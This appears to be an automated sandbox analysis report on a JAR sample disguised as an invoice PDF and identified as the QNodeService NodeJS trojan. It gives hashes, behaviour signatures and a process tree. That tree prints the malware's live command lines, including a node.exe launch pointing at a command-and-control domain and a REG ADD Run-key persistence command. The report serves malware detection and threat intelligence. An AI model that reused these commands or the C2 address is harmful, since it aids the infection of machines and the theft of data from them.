Analysis
-
max time kernel
65s -
max time network
143s -
platform
windows10_x64 -
resource
win10 -
submitted
18-07-2020 08:43
Static task
static1
Behavioral task
behavioral1
Sample
invoice.pdf.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
invoice.pdf.jar
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
invoice.pdf.jar
-
Size
12KB
-
MD5
0e50cb4e9b25da899c46b32c503dceef
-
SHA1
98a5551e4c9a079bf200a45a055210ed5d81868b
-
SHA256
e8d0db564e1a959cc6e308980c5b681841c76d28ac976d99579bcc2b9ff7f420
-
SHA512
5c24a2ab5ce9b5bb0e4835b54efaaa67abe1fb1eda10c62d54fbdb899f03aabd9674b215ded76aa01c45662a82e5d9d0ad5ed40879130f6b10dd4f401718d1b3
Score
10/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3588 wrote to memory of 896 3588 java.exe 68 PID 3588 wrote to memory of 896 3588 java.exe 68 PID 896 wrote to memory of 1312 896 node.exe 69 PID 896 wrote to memory of 1312 896 node.exe 69 PID 1312 wrote to memory of 1420 1312 cmd.exe 70 PID 1312 wrote to memory of 1420 1312 cmd.exe 70 PID 896 wrote to memory of 1500 896 node.exe 71 PID 896 wrote to memory of 1500 896 node.exe 71 -
Loads dropped DLL 4 IoCs
pid Process 1500 node.exe 1500 node.exe 1500 node.exe 1500 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1500 node.exe 1500 node.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Executes dropped EXE 2 IoCs
pid Process 896 node.exe 1500 node.exe -
JavaScript code in executable 2 IoCs
resource yara_rule behavioral2/files/0x000100000001ad9b-113.dat js behavioral2/files/0x000100000001ad9b-121.dat js -
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bfdc-117.dat family_qnodeservice -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 wtfismyip.com 10 wtfismyip.com -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-b18348b9 = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-b18348b9.cmd\"" reg.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\invoice.pdf.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://cocogzy.ddns.net2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:896 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-b18348b9" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-b18348b9.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-b18348b9" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-b18348b9.cmd\""4⤵
- Adds Run key to start application
PID:1420
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://cocogzy.ddns.net3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
- Executes dropped EXE
PID:1500
-
-